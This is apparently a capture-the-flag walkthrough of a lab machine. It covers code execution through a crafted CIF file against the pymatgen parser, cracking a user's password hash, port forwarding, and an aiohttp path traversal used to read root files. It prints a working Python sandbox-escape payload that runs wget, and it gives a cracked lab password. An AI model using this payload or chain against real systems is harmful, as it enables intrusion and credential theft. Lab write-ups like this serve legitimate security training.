Shell as app
We can upload CIF files here
Following this link we can have rce
example payload
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("wget");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a'
I couldnt get any shells to work so i used wget, then in the second payload I used chmod +x and third ./
Shell as Rosa
Password found /home/app/
Password above seems to be nothing. Checking the database file we can see usernames and password hashes.
Rosas hash 63ed86ee9f624c7b14f1d4f43dc251a5 cracks to unicorniosrosados
Shell as Root
Port 8080 is running a webserver on local host
ssh -L 1234:localhost:8080 [email protected]
Site has nothing interesting at first glance
Looking at the response headers we have aiohttp/3.9.1 which has a path traversal exploit
The proof of concept shows the static directory, in our case all we have is the assets directory and the exploit works with it.
Testing exploit
grabbing root flag
I was originally following a different POC which didnt have the -path-as-is flag which turns out is required
If we want to get a full shell we can use the POC above to get the root id_rsa key